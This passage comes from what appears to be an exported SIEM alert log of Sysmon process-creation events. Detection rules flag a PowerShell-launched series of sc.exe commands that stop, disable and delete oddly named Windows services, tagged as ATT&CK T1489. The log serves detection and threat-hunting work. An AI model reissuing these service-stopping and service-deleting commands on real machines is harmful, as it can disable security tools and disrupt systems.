Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.614863400Z"",""eventRecordID"":""3141"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.583\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001065fa2a00}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.583"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001065fa2a00}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.417",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.529 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001052f92a00} +ProcessId: 3620 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationaaal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationaaal Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.535698400Z"",""eventRecordID"":""3140"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.529\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001052f92a00}\r\nProcessId: 3620\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationaaal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.529"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001052f92a00}"",""processId"":""3620"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationaaal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.383",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.070 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00107ef22a00} +ProcessId: 800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.095602500Z"",""eventRecordID"":""3138"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.070\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00107ef22a00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.070"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-00107ef22a00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.321",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.728 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010daef2a00} +ProcessId: 336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.733279200Z"",""eventRecordID"":""3135"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.728\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010daef2a00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.728"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010daef2a00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.279",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.693 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001023ee2a00} +ProcessId: 6188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.696553200Z"",""eventRecordID"":""3133"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.693\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001023ee2a00}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.693"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001023ee2a00}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.267",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.662 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001019ed2a00} +ProcessId: 3908 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.671095400Z"",""eventRecordID"":""3132"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.662\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001019ed2a00}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.662"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001019ed2a00}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.175",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.552 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00103fea2a00} +ProcessId: 1928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 